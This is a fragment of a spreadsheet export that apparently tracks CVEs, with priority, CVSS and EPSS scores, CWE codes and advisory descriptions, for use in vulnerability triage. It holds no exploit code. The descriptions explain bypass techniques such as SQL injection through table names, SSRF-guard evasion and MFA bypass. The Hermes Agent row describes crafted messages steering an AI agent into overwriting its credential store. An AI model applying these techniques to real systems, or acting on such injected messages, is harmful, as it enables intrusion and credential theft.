          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71327</t>
        </is>
      </c>
    </row>
    <row r="2466">
      <c r="A2466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72835</t>
        </is>
      </c>
      <c r="C2466" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2466" s="5" t="inlineStr"/>
      <c r="F2466" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2466" s="5" t="inlineStr"/>
      <c r="H2466" s="5" t="inlineStr"/>
      <c r="I2466" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J2466" s="5" t="inlineStr"/>
      <c r="K2466" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="L2466" s="5" t="inlineStr">
        <is>
          <t>filebrowser versions before v2.63.21 fail to canonicalize paths before evaluating access rules, allowing authenticated users to bypass administrator-defined deny rules using case-variant or backslash-separated paths. Attackers can request files with alternate path representations that match no rule but resolve to the same filesystem object, gaining unauthorized access to denied files within their scope.</t>
        </is>
      </c>
      <c r="M2466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72835</t>
        </is>
      </c>
    </row>
    <row r="2467">
      <c r="A2467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73083</t>
        </is>
      </c>
      <c r="C2467" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2467" s="5" t="inlineStr"/>
      <c r="F2467" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2467" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2467" s="5" t="inlineStr"/>
      <c r="I2467" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2467" s="5" t="inlineStr"/>
      <c r="K2467" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2467" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.80.0, in SANDBOX_CODE_ONLY mode, the engine loads the compiled user module with importFresh(), a wrapper around Node.js require(), before the V8 isolate is applied. Top-level module code can therefore call require('child_process'), access fs, and use other Node.js APIs in the host engine process outside the sandbox. An authenticated user who can create a Code step can read environment secrets including AP_ENCRYPTION_KEY and AP_JWT_SECRET, read or write files, and reach internal services. This issue is fixed in version 0.80.0.</t>
        </is>
      </c>
      <c r="M2467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73083</t>
        </is>
      </c>
    </row>
    <row r="2468">
      <c r="A2468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73264</t>
        </is>
      </c>
      <c r="C2468" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2468" s="5" t="inlineStr"/>
      <c r="F2468" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2468" s="5" t="inlineStr"/>
      <c r="H2468" s="5" t="inlineStr"/>
      <c r="I2468" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2468" s="5" t="inlineStr"/>
      <c r="K2468" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2468" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.33.1, an authenticated user with Lighthouse provider configuration access could supply an unvalidated base_url for the openai_compatible provider through POST /api/v1/lighthouse/providers and POST /api/v1/lighthouse/providers/{id}/connection, causing api/src/backend/tasks/jobs/lighthouse_providers.py to send outbound requests, including the API key in the Authorization header, to attacker-controlled or internal endpoints when client.models.list was called. This issue is fixed in version 5.33.1.</t>
        </is>
      </c>
      <c r="M2468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73264</t>
        </is>
      </c>
    </row>
    <row r="2469">
      <c r="A2469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73313</t>
        </is>
      </c>
      <c r="C2469" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2469" s="5" t="inlineStr"/>
      <c r="F2469" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2469" s="5" t="inlineStr"/>
      <c r="H2469" s="5" t="inlineStr"/>
      <c r="I2469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2469" s="5" t="inlineStr"/>
      <c r="K2469" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2469" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t>
        </is>
      </c>
      <c r="M2469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t>
        </is>
      </c>
    </row>
    <row r="2470">
      <c r="A2470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73408</t>
        </is>
      </c>
      <c r="C2470" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2470" s="5" t="inlineStr"/>
      <c r="F2470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2470" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2470" s="5" t="inlineStr"/>
      <c r="I2470" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2470" s="5" t="inlineStr"/>
      <c r="K2470" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2470" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.18, packages/server/src/integrations/mysql.ts enabled multipleStatements and inserted an unescaped tableName into a DESCRIBE statement. An attacker able to create a MySQL table with a backtick and stacked statement in its name could wait for a Budibase administrator to run schema discovery, causing the second statement to execute. The fix applies quoteMySqlIdentifier before constructing the query. This issue is fixed in version 3.39.18.</t>
        </is>
      </c>
      <c r="M2470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73408</t>
        </is>
      </c>
    </row>
    <row r="2471">
      <c r="A2471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73611</t>
        </is>
      </c>
      <c r="C2471" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2471" s="5" t="inlineStr"/>
      <c r="F2471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2471" s="5" t="inlineStr"/>
      <c r="H2471" s="5" t="inlineStr"/>
      <c r="I2471" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2471" s="5" t="inlineStr"/>
      <c r="K2471" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2471" s="5" t="inlineStr">
        <is>
          <t>File Browser versions from 2.50.0 through 2.63.21 fail to validate JWT expiration when proxy authentication is configured with a non-default logout page. Attackers with a previously valid token can access protected routes and administrative endpoints indefinitely, and exchange expired tokens for fresh ones via the renewal endpoint.</t>
        </is>
      </c>
      <c r="M2471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73611</t>
        </is>
      </c>
    </row>
    <row r="2472">
      <c r="A2472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77110</t>
        </is>
      </c>
      <c r="C2472" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2472" s="5" t="inlineStr"/>
      <c r="F2472" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2472" s="5" t="inlineStr"/>
      <c r="H2472" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I2472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2472" s="5" t="inlineStr"/>
      <c r="K2472" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2472" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M2472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t>
        </is>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77368</t>
        </is>
      </c>
      <c r="C2473" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2473" s="5" t="inlineStr"/>
      <c r="F2473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2473" s="5" t="inlineStr"/>
      <c r="H2473" s="5" t="inlineStr"/>
      <c r="I2473" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2473" s="5" t="inlineStr"/>
      <c r="K2473" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2473" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In version 4.39, the filer's TUS resumable-upload handler checks JWT allowed_prefixes scoping only when a session is created, letting a low-privilege tenant hijack another tenant's upload session to write content to filer paths their own token forbids. The HEAD, PATCH, and DELETE verbs that act on an existing session by its id never verify that the session's stored target path falls within the caller's allowed prefixes, so a tenant who obtains another upload's session identifier can PATCH attacker bytes into it and, on completion, have the file land at the victim's out-of-scope path. The same token can also DELETE other tenants' sessions and HEAD them to read upload progress and size, defeating the JWT prefix isolation. This vulnerability only affects deployments that configure filer JWT signing and have TUS uploads enabled. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M2473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77368</t>
        </is>
      </c>
    </row>
    <row r="2474">
      <c r="A2474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79639</t>
        </is>
      </c>
      <c r="C2474" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2474" s="5" t="inlineStr"/>
      <c r="F2474" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2474" s="5" t="inlineStr"/>
      <c r="H2474" s="5" t="inlineStr"/>
      <c r="I2474" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2474" s="5" t="inlineStr"/>
      <c r="K2474" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2474"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2474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79639</t>
        </is>
      </c>
    </row>
    <row r="2475">
      <c r="A2475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79749</t>
        </is>
      </c>
      <c r="C2475" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2475" s="5" t="inlineStr"/>
      <c r="F2475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2475" s="5" t="inlineStr"/>
      <c r="H2475" s="5" t="inlineStr"/>
      <c r="I2475" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2475" s="5" t="inlineStr"/>
      <c r="K2475" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2475" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, MCPHub's SSRF guard in src/utils/ssrf.ts uses a custom isBlockedIpv6 function that only checks for loopback, link-local, unique-local, IPv4-mapped, and IPv4-compatible IPv6 addresses. IPv6 transition address families -- NAT64 (64:ff9b::/96), 6to4 (2002::/16), and Teredo (2001::/32) -- are not checked. An attacker who can specify a URL for an MCP server connection can encode a private IPv4 address inside one of these IPv6 forms to bypass the SSRF guard and reach internal infrastructure. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M2475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79749</t>
        </is>
      </c>
    </row>
    <row r="2476">
      <c r="A2476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80182</t>
        </is>
      </c>
      <c r="C2476" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2476" s="5" t="inlineStr"/>
      <c r="F2476" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2476" s="5" t="inlineStr"/>
      <c r="H2476" s="5" t="inlineStr"/>
      <c r="I2476" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2476" s="5" t="inlineStr"/>
      <c r="K2476" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2476" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, tokens obtained via OAuth1 access token, application credential, or trust-scoped authentication could create new long-lived credentials or authorize new delegations that persist independently of, and outlive, the credential used to obtain them. The delegation restrictions that block these operations did not consistently apply to all delegated token types, allowing an OAuth1-scoped token, for example, to create application credentials or authorize OAuth1 request tokens despite those operations being restricted for other delegated token types. All Keystone deployments that permit delegated authentication through OAuth1 access tokens, application credentials, or trusts are affected.</t>
        </is>
      </c>
      <c r="M2476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80182</t>
        </is>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82020</t>
        </is>
      </c>
      <c r="C2477" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2477" s="5" t="inlineStr"/>
      <c r="F2477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2477" s="5" t="inlineStr"/>
      <c r="H2477" s="5" t="inlineStr"/>
      <c r="I2477" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2477" s="5" t="inlineStr"/>
      <c r="K2477" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L2477" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.16.0 prior to 0.17.0 contains an improper path restriction vulnerability that allows attackers who can influence ingested message content to overwrite the credential store by bypassing sensitive-path guards that excluded the auth.json file. Attackers can craft malicious messages directing the agent's file-write tooling to overwrite the credential store without triggering any path-based protection, enabling credential tampering or unauthorized access.</t>
        </is>
      </c>
      <c r="M2477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82020</t>
        </is>
      </c>
    </row>
    <row r="2478">
      <c r="A2478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="C2478" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2478" s="5" t="inlineStr"/>
      <c r="F2478" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2478" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2478" s="5" t="inlineStr"/>
      <c r="I2478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2478" s="5" t="inlineStr"/>
      <c r="K2478" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2478" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="M2478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="2479">
      <c r="A2479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85197</t>
        </is>
      </c>
      <c r="C2479" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2479" s="5" t="inlineStr"/>
      <c r="F2479" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2479" s="5" t="inlineStr"/>
      <c r="H2479" s="5" t="inlineStr"/>
      <c r="I2479" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2479" s="5" t="inlineStr"/>
      <c r="K2479" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2479" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libsoup. A malicious HTTP/2 server or a Man-in-the-Middle (MITM) attacker can exploit a heap use-after-free vulnerability in the HTTP/2 client implementation. This occurs when a GNOME application uploads a file using HTTP/2, and the server sends a GOAWAY frame while the file body is being read asynchronously. This can lead to memory corruption, potentially resulting in information disclosure or arbitrary code execution.</t>
        </is>
      </c>
      <c r="M2479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85197</t>
        </is>
      </c>
    </row>
    <row r="2480">
      <c r="A2480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85221</t>
        </is>
      </c>
      <c r="C2480" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2480" s="5" t="inlineStr"/>
      <c r="F2480" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2480" s="5" t="inlineStr"/>
      <c r="H2480" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I2480" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2480" s="5" t="inlineStr"/>
      <c r="K2480" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2480" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper TLS certificate validation vulnerability in CurlClient. The CurlClient::$verifyPeer property was not explicitly initialized and therefore defaulted to null. When passed to cURL, this value effectively disabled TLS peer verification unless the calling code explicitly enabled it.
As a result, HTTPS connections made through affected CurlClient instances could accept certificates that were not issued by a trusted certificate authority. An attacker capable of intercepting or manipulating network traffic between a MISP instance and a remote HTTPS service could impersonate the remote endpoint and perform a man-in-the-middle attack.
Successful exploitation could allow an attacker to observe sensitive information transmitted by MISP, including authentication material or exchanged threat intelligence, and to modify responses returned to the MISP instance. The impact depends on the functionality using CurlClient and the data exchanged with the remote service.
The patch enables TLS peer verification by default while preserving explicit support for configured self-signed certificates. It also corrects the self-signed certificate handling in SyncTool so that peer verification is disabled only when no pinned CA certificate is configured.</t>
        </is>
      </c>
      <c r="M2480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85221</t>
        </is>
      </c>
    </row>
    <row r="2481">
      <c r="A2481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85533</t>
        </is>
      </c>
      <c r="C2481" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2481" s="5" t="inlineStr"/>
      <c r="F2481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2481" s="5" t="inlineStr"/>
      <c r="H2481" s="5" t="inlineStr"/>
      <c r="I2481" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2481" s="5" t="inlineStr"/>
      <c r="K2481" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2481" s="5" t="inlineStr">
        <is>
          <t>An authorization flaw in MISP allowed an authenticated user to submit a sharing_group_id without verifying that the user was authorized to use the referenced Sharing Group.
In several attribute and Galaxy Cluster creation and editing workflows, validation of the submitted Sharing Group was performed only when the request explicitly set the distribution field to 4 ("Sharing Group"). An attacker could therefore craft a request containing a sharing_group_id while omitting the distribution parameter, or otherwise avoiding the distribution == 4 condition, causing the Sharing Group authorization check to be skipped.
This could allow a user with permission to create or modify the affected MISP objects to associate data with a Sharing Group that they are not authorized to use. Depending on the affected object's existing distribution settings and subsequent processing, this could bypass intended information-sharing boundaries and result in unauthorized placement or distribution of data to members of another Sharing Group.
The issue affected attribute attachment and editing operations as well as Galaxy Cluster creation and editing. The fix ensures that authorization is performed whenever a non-empty sharing_group_id is submitted, independently of the distribution parameter. It also centralizes the authorization decision in SharingGroup::canUse() and explicitly rejects empty Sharing Group identifiers rather than allowing them to be interpreted as an unrestricted query.</t>
        </is>
      </c>
      <c r="M2481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85533</t>
        </is>
      </c>
    </row>
    <row r="2482">
      <c r="A2482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2482" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44319</t>
        </is>
      </c>
      <c r="C2482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2482" s="5" t="inlineStr"/>
      <c r="F2482" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2482" s="5" t="inlineStr"/>
      <c r="H2482" s="5" t="inlineStr"/>
      <c r="I2482" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2482" s="5" t="inlineStr"/>
      <c r="K2482" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2482" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone 1 and AR.Drone 2 are vulnerable to Denial of Service. The Parrot AR.Drone platform is vulnerable to Wi-Fi deauthentication attack, allowing remote and unauthenticated attackers to disconnect drone from controller during mid-flight.</t>
        </is>
      </c>
      <c r="M2482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44319</t>
        </is>
      </c>
    </row>
    <row r="2483">
      <c r="A2483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2483" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44320</t>
        </is>
      </c>
      <c r="C2483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2483" s="5" t="inlineStr"/>
      <c r="F2483" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2483" s="5" t="inlineStr"/>
      <c r="H2483" s="5" t="inlineStr"/>
      <c r="I2483" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2483" s="5" t="inlineStr"/>
      <c r="K2483" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2483" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone version 1 and 2 does not employ a suitable mechanism to prevent denial-of-service (DoS) attacks. An attacker can harm the device availability (i.e., video streaming and control) by using tool to perform an IPv4 flood attack. Verified attacks includes SYN flooding and UDP flooding.</t>
        </is>
      </c>
      <c r="M2483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44320</t>
        </is>
      </c>
    </row>
    <row r="2484">
      <c r="A2484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2484" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-23173</t>
        </is>
      </c>
      <c r="C2484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2484" s="5" t="inlineStr"/>
      <c r="F2484" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2484" s="5" t="inlineStr"/>
      <c r="H2484" s="5" t="inlineStr">
        <is>
          <t>versa-networks:versa_director</t>
        </is>
      </c>
      <c r="I2484" s="5" t="inlineStr">
        <is>
          <t>2025-06-19</t>
        </is>
      </c>
      <c r="J2484" s="5" t="inlineStr"/>
      <c r="K2484" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2484" s="5"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weaknesses that can be exploited, potentially leading to remote code execution. 
Versa Networks is not aware of any reported instance where this vulnerability was exploited. Proof of concept for this vulnerability has been disclosed by third party security researchers.  
Workarounds or Mitigation: 
Restrict access to TCP port 6080 if uCPE console access is not necessary. Versa recommends that Director be upgraded to one of the remediated software versions.</t>
        </is>
      </c>
      <c r="M2484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-23173</t>
        </is>
      </c>
    </row>
    <row r="2485">
      <c r="A2485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2485" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48431</t>
        </is>
      </c>
      <c r="C2485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2485" s="5" t="inlineStr"/>
      <c r="F2485" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2485" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2485" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2485" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2485" s="5" t="inlineStr"/>
      <c r="K2485" s="5" t="inlineStr">
        <is>
          <t>CWE-762, CWE-763</t>
        </is>
      </c>
      <c r="L2485" s="5" t="inlineStr">
        <is>
          <t>Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
Description: Specially crafted requests can crash an c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message.</t>
        </is>
      </c>
      <c r="M2485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48431</t>
        </is>
      </c>
    </row>
